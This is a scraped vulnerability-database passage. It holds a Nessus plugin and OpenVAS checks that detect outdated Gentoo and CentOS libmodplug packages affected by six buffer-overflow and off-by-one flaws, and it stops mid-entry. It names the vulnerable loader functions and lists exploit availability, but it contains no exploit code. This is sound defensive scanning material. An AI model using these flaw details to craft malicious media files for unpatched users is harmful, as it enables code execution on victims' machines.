GLSA-201203-16 : ModPlug: User-assisted execution of arbitrary code
2012-03-19T00:00:00
ID: GENTOO_GLSA-201203-16.NASL
Type: nessus
Reporter: This script is Copyright (C) 2012-2021 Tenable Network Security, Inc.
Modified: 2012-03-19T00:00:00
Description
The remote host is affected by the vulnerability described in GLSA-201203-16
(ModPlug: User-assisted execution of arbitrary code)
Multiple vulnerabilities have been found in ModPlug:
- The ReadS3M method in load_s3m.cpp fails to validate user-supplied
  information, which could cause a stack-based buffer overflow
  (CVE-2011-1574).
- The 'CSoundFile::ReadWav()' function in load_wav.cpp contains an
  integer overflow which could cause a heap-based buffer overflow
  (CVE-2011-2911).
- The 'CSoundFile::ReadS3M()' function in load_s3m.cpp contains
  multiple boundary errors which could cause a stack-based buffer
  overflow (CVE-2011-2912).
- The 'CSoundFile::ReadAMS()' function in load_ams.cpp contains an
  off-by-one error which could cause memory corruption (CVE-2011-2913).
- The 'CSoundFile::ReadDSM()' function in load_dms.cpp contains an
  off-by-one error which could cause memory corruption (CVE-2011-2914).
- The 'CSoundFile::ReadAMS2()' function in load_ams.cpp contains an
  off-by-one error which could cause memory corruption (CVE-2011-2915).
Impact :
A remote attacker could entice a user to open a specially crafted media
file, possibly resulting in execution of arbitrary code, or a Denial of
Service condition.
Workaround :
There is no known workaround at this time.
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were
# extracted from Gentoo Linux Security Advisory GLSA 201203-16.
#
# The advisory text is Copyright (C) 2001-2015 Gentoo Foundation, Inc.
# and licensed under the Creative Commons - Attribution / Share Alike
# license. See http://creativecommons.org/licenses/by-sa/3.0/
#
include('deprecated_nasl_level.inc');
include('compat.inc');
# Metadata branch: when `description` is set, only the registration calls
# below run and the script leaves through the exit(0) that closes this block,
# so the package check further down is not reached in that mode.
if (description)
{
script_id(58381);
script_version("1.11");
script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/06");
# Identifiers this plugin reports against: six CVEs, two Bugtraq ids and the
# Gentoo advisory number.
script_cve_id("CVE-2011-1574", "CVE-2011-2911", "CVE-2011-2912", "CVE-2011-2913", "CVE-2011-2914", "CVE-2011-2915");
script_bugtraq_id(47248, 48979);
script_xref(name:"GLSA", value:"201203-16");
script_name(english:"GLSA-201203-16 : ModPlug: User-assisted execution of arbitrary code");
script_summary(english:"Checks for updated package(s) in /var/db/pkg");
script_set_attribute(
attribute:"synopsis",
value:
"The remote Gentoo host is missing one or more security-related
patches."
);
# Advisory text shown in the finding. All six issues are parsing flaws in the
# module-file loaders; per the Impact paragraph they are reached when a user
# opens a crafted media file.
script_set_attribute(
attribute:"description",
value:
"The remote host is affected by the vulnerability described in GLSA-201203-16
(ModPlug: User-assisted execution of arbitrary code)
Multiple vulnerabilities have been found in ModPlug:
The ReadS3M method in load_s3m.cpp fails to validate user-supplied
information, which could cause a stack-based buffer overflow
(CVE-2011-1574).
The 'CSoundFile::ReadWav()' function in load_wav.cpp contains an
integer overflow which could cause a heap-based buffer overflow
(CVE-2011-2911).
The 'CSoundFile::ReadS3M()' function in load_s3m.cpp contains
multiple boundary errors which could cause a stack-based buffer
overflow (CVE-2011-2912).
The 'CSoundFile::ReadAMS()' function in load_ams.cpp contains an
off-by-one error which could cause memory corruption (CVE-2011-2913).
The 'CSoundFile::ReadDSM()' function in load_dms.cpp contains an
off-by-one error which could cause memory corruption (CVE-2011-2914).
The 'CSoundFile::ReadAMS2()' function in load_ams.cpp contains an
off-by-one error which could cause memory corruption (CVE-2011-2915).
Impact :
A remote attacker could entice a user to open a specially crafted media
file, possibly resulting in execution of arbitrary code, or a Denial of
Service condition.
Workaround :
There is no known workaround at this time."
);
script_set_attribute(
attribute:"see_also",
value:"https://security.gentoo.org/glsa/201203-16"
);
# Remediation text. The lines beginning with "# emerge" are part of the string
# (root-shell commands quoted from the advisory), not NASL comments. The fixed
# version named here, 0.8.8.4, is the same threshold the package check uses.
script_set_attribute(
attribute:"solution",
value:
"All ModPlug users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose '>=media-libs/libmodplug-0.8.8.4'
NOTE: This is a legacy GLSA. Updates for all affected architectures are
available since August 27, 2011. It is likely that your system is already
no longer affected by this issue."
);
# CVSS v2 base vector: network access vector, medium access complexity, no
# authentication, partial impact on confidentiality, integrity and availability.
script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P");
# CVSS v2 temporal vector: functional exploit code (E:F), official fix
# available (RL:OF), report confirmed (RC:C).
script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
# Exploit-availability metadata for the CVE set as a whole.
# NOTE(review): the only exploit named here is a Metasploit module whose title
# refers to VLC and the ReadS3M overflow; treat these flags as a prioritisation
# signal for patching, not as evidence about this particular host.
script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
script_set_attribute(attribute:"exploit_available", value:"true");
script_set_attribute(attribute:"exploit_framework_core", value:"true");
script_set_attribute(attribute:"metasploit_name", value:'VideoLAN VLC ModPlug ReadS3M Stack Buffer Overflow');
script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
script_set_attribute(attribute:"exploit_framework_canvas", value:"true");
script_set_attribute(attribute:"canvas_package", value:'White_Phosphorus');
# Declared as a local check, scoped by CPE to the Gentoo libmodplug package.
script_set_attribute(attribute:"plugin_type", value:"local");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:gentoo:linux:libmodplug");
script_set_attribute(attribute:"cpe", value:"cpe:/o:gentoo:linux");
script_set_attribute(attribute:"patch_publication_date", value:"2012/03/16");
script_set_attribute(attribute:"plugin_publication_date", value:"2012/03/19");
script_end_attributes();
script_category(ACT_GATHER_INFO);
script_copyright(english:"This script is Copyright (C) 2012-2021 Tenable Network Security, Inc.");
script_family(english:"Gentoo Local Security Checks");
# The check consumes data gathered by ssh_get_info.nasl and needs the three KB
# keys below.
# NOTE(review): when those keys are absent the plugin yields no finding, which
# should not be read as "host is patched" - confirm scan credentials first.
script_dependencies("ssh_get_info.nasl");
script_require_keys("Host/local_checks_enabled", "Host/Gentoo/release", "Host/Gentoo/qpkg-list");
exit(0);
}
include("audit.inc");
include("global_settings.inc");
include("qpkg.inc");
# Preconditions: stop with the matching audit code unless local checks are
# enabled, the target was identified as Gentoo, and a package list was
# collected for it.
if (!get_kb_item("Host/local_checks_enabled"))
{
  audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
}
if (!get_kb_item("Host/Gentoo/release"))
{
  audit(AUDIT_OS_NOT, "Gentoo");
}
if (!get_kb_item("Host/Gentoo/qpkg-list"))
{
  audit(AUDIT_PACKAGE_LIST_MISSING);
}

# Version comparison against the advisory's fixed release: anything below
# 0.8.8.4 counts as vulnerable, 0.8.8.4 and later as unaffected.
# Only the media-libs/libmodplug package entry is compared; copies of the
# library bundled inside other packages are not examined by this check.
flag = 0;
if (qpkg_check(package:"media-libs/libmodplug",
               unaffected:make_list("ge 0.8.8.4"),
               vulnerable:make_list("lt 0.8.8.4")))
{
  flag++;
}

if (!flag)
{
  # Nothing matched: distinguish "package seen but already fixed" from
  # "package not present in the list at all".
  tested = qpkg_tests_get();
  if (tested)
  {
    audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
  }
  else
  {
    audit(AUDIT_PACKAGE_NOT_INSTALLED, "ModPlug");
  }
}
else
{
  # Vulnerable version found: raise a warning-level finding, attaching the
  # package report only when report verbosity is above zero.
  if (report_verbosity > 0)
  {
    security_warning(port:0, extra:qpkg_report_get());
  }
  else
  {
    security_warning(0);
  }
  exit(0);
}
{"id": "GENTOO_GLSA-201203-16.NASL", "bulletinFamily": "scanner", "title": "GLSA-201203-16 : ModPlug: User-assisted execution of arbitrary code", "description": "The remote host is affected by the vulnerability described in GLSA-201203-16\n(ModPlug: User-assisted execution of arbitrary code)\n\n Multiple vulnerabilities have been found in ModPlug:\n The ReadS3M method in load_s3m.cpp fails to validate user-supplied\n information, which could cause a stack-based buffer overflow\n (CVE-2011-1574).\n The 'CSoundFile::ReadWav()' function in load_wav.cpp contains an\n integer overflow which could cause a heap-based buffer overflow\n (CVE-2011-2911).\n The 'CSoundFile::ReadS3M()' function in load_s3m.cpp contains\n multiple boundary errors which could cause a stack-based buffer\n overflow (CVE-2011-2912).\n The 'CSoundFile::ReadAMS()' function in load_ams.cpp contains an\n off-by-one error which could cause memory corruption (CVE-2011-2913).\n The 'CSoundFile::ReadDSM()' function in load_dms.cpp contains an\n off-by-one error which could cause memory corruption (CVE-2011-2914).\n The 'CSoundFile::ReadAMS2()' function in load_ams.cpp contains an\n off-by-one error which could cause memory corruption (CVE-2011-2915).\n \nImpact :\n\n A remote attacker could entice a user to open a specially crafted media\n file, possibly resulting in execution of arbitrary code, or a Denial of\n Service condition.\n \nWorkaround :\n\n There is no known workaround at this time.", "published": "2012-03-19T00:00:00", "modified": "2012-03-19T00:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "href": "https://www.tenable.com/plugins/nessus/58381", "reporter": "This script is Copyright (C) 2012-2021 Tenable Network Security, Inc.", "references": ["https://security.gentoo.org/glsa/201203-16"], "cvelist": ["CVE-2011-2913", "CVE-2011-2912", "CVE-2011-1574", "CVE-2011-2915", "CVE-2011-2911", "CVE-2011-2914"], "type": "nessus", "lastseen": "2021-01-07T10:53:32", "edition": 22, 
"viewCount": 1, "enchantments": {"dependencies": {"references": [{"type": "openvas", "idList": ["OPENVAS:71302", "OPENVAS:870483", "OPENVAS:1361412562310881372", "OPENVAS:136141256231071300", "OPENVAS:881372", "OPENVAS:136141256231071302", "OPENVAS:840800", "OPENVAS:1361412562310870483", "OPENVAS:1361412562310863809", "OPENVAS:1361412562310880974"]}, {"type": "gentoo", "idList": ["GLSA-201203-16", "GLSA-201203-14"]}, {"type": "ubuntu", "idList": ["USN-1255-1", "USN-1148-1"]}, {"type": "centos", "idList": ["CESA-2011:0477", "CESA-2011:1264"]}, {"type": "redhat", "idList": ["RHSA-2011:1264", "RHSA-2011:0477"]}, {"type": "oraclelinux", "idList": ["ELSA-2011-1264", "ELSA-2011-0477"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:11574", "SECURITYVULNS:VULN:12028", "SECURITYVULNS:DOC:27284"]}, {"type": "nessus", "idList": ["ORACLELINUX_ELSA-2011-1264.NASL", "CENTOS_RHSA-2011-1264.NASL", "FEDORA_2011-10503.NASL", "FEDORA_2011-10544.NASL", "GENTOO_GLSA-201203-14.NASL", "UBUNTU_USN-1255-1.NASL", "REDHAT-RHSA-2011-1264.NASL", "FEDORA_2011-10452.NASL", "SL_20110906_GSTREAMER_PLUGINS_ON_SL4_X.NASL", "FEDORA_2011-12370.NASL"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2011:0943-1"]}, {"type": "debian", "idList": ["DEBIAN:DSA-2226-1:EB2E2", "DEBIAN:DSA-2415-1:6A5A5"]}, {"type": "fedora", "idList": ["FEDORA:7589D28259", "FEDORA:2D39D110B4E", "FEDORA:0F99C110FD5", "FEDORA:73F37110CA6", "FEDORA:92B48110E1C"]}, {"type": "cve", "idList": ["CVE-2011-2914", "CVE-2011-2913", "CVE-2011-2915", "CVE-2011-1574", "CVE-2011-2912", "CVE-2011-2911"]}, {"type": "saint", "idList": ["SAINT:114116FE009CEA3405415E74B271E604", "SAINT:ECB5BDC1AA42880516325F32A021D963", "SAINT:B21ACF2EB9B8F35B9EB742A262AFFAD0"]}, {"type": "exploitdb", "idList": ["EDB-ID:17252"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:101216"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/FILEFORMAT/VLC_MODPLUG_S3M"]}], "modified": "2021-01-07T10:53:32", "rev": 2}, "score": {"value": 7.5, "vector": 
"NONE", "modified": "2021-01-07T10:53:32", "rev": 2}, "vulnersScore": 7.5}, "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201203-16.\n#\n# The advisory text is Copyright (C) 2001-2015 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(58381);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2011-1574\", \"CVE-2011-2911\", \"CVE-2011-2912\", \"CVE-2011-2913\", \"CVE-2011-2914\", \"CVE-2011-2915\");\n script_bugtraq_id(47248, 48979);\n script_xref(name:\"GLSA\", value:\"201203-16\");\n\n script_name(english:\"GLSA-201203-16 : ModPlug: User-assisted execution of arbitrary code\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201203-16\n(ModPlug: User-assisted execution of arbitrary code)\n\n Multiple vulnerabilities have been found in ModPlug:\n The ReadS3M method in load_s3m.cpp fails to validate user-supplied\n information, which could cause a stack-based buffer overflow\n (CVE-2011-1574).\n The 'CSoundFile::ReadWav()' function in load_wav.cpp contains an\n integer overflow which could cause a heap-based buffer overflow\n (CVE-2011-2911).\n The 'CSoundFile::ReadS3M()' function in load_s3m.cpp contains\n multiple boundary errors which could cause a stack-based buffer\n overflow (CVE-2011-2912).\n The 
'CSoundFile::ReadAMS()' function in load_ams.cpp contains an\n off-by-one error which could cause memory corruption (CVE-2011-2913).\n The 'CSoundFile::ReadDSM()' function in load_dms.cpp contains an\n off-by-one error which could cause memory corruption (CVE-2011-2914).\n The 'CSoundFile::ReadAMS2()' function in load_ams.cpp contains an\n off-by-one error which could cause memory corruption (CVE-2011-2915).\n \nImpact :\n\n A remote attacker could entice a user to open a specially crafted media\n file, possibly resulting in execution of arbitrary code, or a Denial of\n Service condition.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201203-16\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All ModPlug users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=media-libs/libmodplug-0.8.8.4'\n NOTE: This is a legacy GLSA. Updates for all affected architectures are\n available since August 27, 2011. 
It is likely that your system is already\n no longer affected by this issue.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'VideoLAN VLC ModPlug ReadS3M Stack Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'White_Phosphorus');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:libmodplug\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/03/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/03/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif 
(qpkg_check(package:\"media-libs/libmodplug\", unaffected:make_list(\"ge 0.8.8.4\"), vulnerable:make_list(\"lt 0.8.8.4\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:qpkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ModPlug\");\n}\n", "naslFamily": "Gentoo Local Security Checks", "pluginID": "58381", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:libmodplug"], "scheme": null}
{"openvas": [{"lastseen": "2017-07-24T12:50:57", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-2913", "CVE-2011-2912", "CVE-2011-1574", "CVE-2011-2915", "CVE-2011-2911", "CVE-2011-2914"], "description": "The remote host is missing updates announced in\nadvisory GLSA 201203-16.", "modified": "2017-07-07T00:00:00", "published": "2012-04-30T00:00:00", "id": "OPENVAS:71302", "href": "http://plugins.openvas.org/nasl.php?oid=71302", "type": "openvas", "title": "Gentoo Security Advisory GLSA 201203-16 (libmodplug)", "sourceData": "#\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Multiple vulnerabilities in ModPlug could result in execution of\n arbitrary code or Denial of Service.\";\ntag_solution = \"All ModPlug users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=media-libs/libmodplug-0.8.8.4'\n \n\nNOTE: This is a legacy GLSA. 
Updates for all affected architectures are\n available since August 27, 2011. It is likely that your system is\nalready\n no longer affected by this issue.\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20201203-16\nhttp://bugs.gentoo.org/show_bug.cgi?id=362503\nhttp://bugs.gentoo.org/show_bug.cgi?id=379557\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 201203-16.\";\n\n \n \nif(description)\n{\n script_id(71302);\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_cve_id(\"CVE-2011-1574\", \"CVE-2011-2911\", \"CVE-2011-2912\", \"CVE-2011-2913\", \"CVE-2011-2914\", \"CVE-2011-2915\");\n script_version(\"$Revision: 6589 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 10:27:50 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-04-30 07:59:57 -0400 (Mon, 30 Apr 2012)\");\n script_name(\"Gentoo Security Advisory GLSA 201203-16 (libmodplug)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\nres = \"\";\nreport = \"\";\nif((res = ispkgvuln(pkg:\"media-libs/libmodplug\", unaffected: make_list(\"ge 0.8.8.4\"), vulnerable: make_list(\"lt 0.8.8.4\"))) != NULL ) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:39:18", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-2913", "CVE-2011-2912", "CVE-2011-1574", "CVE-2011-2915", "CVE-2011-2911", "CVE-2011-2914"], "description": "The remote host is missing updates announced in\nadvisory GLSA 201203-16.", "modified": "2018-10-12T00:00:00", "published": "2012-04-30T00:00:00", "id": "OPENVAS:136141256231071302", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231071302", "type": "openvas", "title": "Gentoo Security Advisory GLSA 201203-16 (libmodplug)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: glsa_201203_16.nasl 11859 2018-10-12 08:53:01Z cfischer $\n#\n# Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. 
http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.71302\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_cve_id(\"CVE-2011-1574\", \"CVE-2011-2911\", \"CVE-2011-2912\", \"CVE-2011-2913\", \"CVE-2011-2914\", \"CVE-2011-2915\");\n script_version(\"$Revision: 11859 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-12 10:53:01 +0200 (Fri, 12 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-04-30 07:59:57 -0400 (Mon, 30 Apr 2012)\");\n script_name(\"Gentoo Security Advisory GLSA 201203-16 (libmodplug)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name:\"insight\", value:\"Multiple vulnerabilities in ModPlug could result in execution of\n arbitrary code or Denial of Service.\");\n script_tag(name:\"solution\", value:\"All ModPlug users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=media-libs/libmodplug-0.8.8.4'\n\n\nNOTE: This is a legacy GLSA. Updates for all affected architectures are\n available since August 27, 2011. It is likely that your system is\nalready\n no longer affected by this issue.\");\n\n script_xref(name:\"URL\", value:\"http://www.securityspace.com/smysecure/catid.html?in=GLSA%20201203-16\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=362503\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=379557\");\n script_tag(name:\"summary\", value:\"The remote host is missing updates announced in\nadvisory GLSA 201203-16.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"pkg-lib-gentoo.inc\");\ninclude(\"revisions-lib.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = ispkgvuln(pkg:\"media-libs/libmodplug\", unaffected: make_list(\"ge 0.8.8.4\"), vulnerable: make_list(\"lt 0.8.8.4\"))) != NULL ) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:39:10", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-2913", "CVE-2011-2912", "CVE-2011-2915", "CVE-2011-2911", "CVE-2011-2914"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2012-07-30T00:00:00", "id": 
"OPENVAS:1361412562310881372", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310881372", "type": "openvas", "title": "CentOS Update for gstreamer-plugins CESA-2011:1264 centos4 x86_64", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for gstreamer-plugins CESA-2011:1264 centos4 x86_64\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2011-September/017720.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.881372\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-07-30 17:37:14 +0530 (Mon, 30 Jul 2012)\");\n script_cve_id(\"CVE-2011-2911\", \"CVE-2011-2912\", \"CVE-2011-2913\", \"CVE-2011-2914\", \"CVE-2011-2915\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_xref(name:\"CESA\", 
value:\"2011:1264\");\n script_name(\"CentOS Update for gstreamer-plugins CESA-2011:1264 centos4 x86_64\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'gstreamer-plugins'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS4\");\n script_tag(name:\"affected\", value:\"gstreamer-plugins on CentOS 4\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"insight\", value:\"The gstreamer-plugins packages contain plug-ins used by the GStreamer\n streaming-media framework to support a wide variety of media formats.\n\n An integer overflow flaw, a boundary error, and multiple off-by-one flaws\n were found in various ModPlug music file format library (libmodplug)\n modules, embedded in GStreamer. An attacker could create specially-crafted\n music files that, when played by a victim, would cause applications using\n GStreamer to crash or, potentially, execute arbitrary code. (CVE-2011-2911,\n CVE-2011-2912, CVE-2011-2913, CVE-2011-2914, CVE-2011-2915)\n\n All users of gstreamer-plugins are advised to upgrade to these updated\n packages, which contain backported patches to correct these issues. 
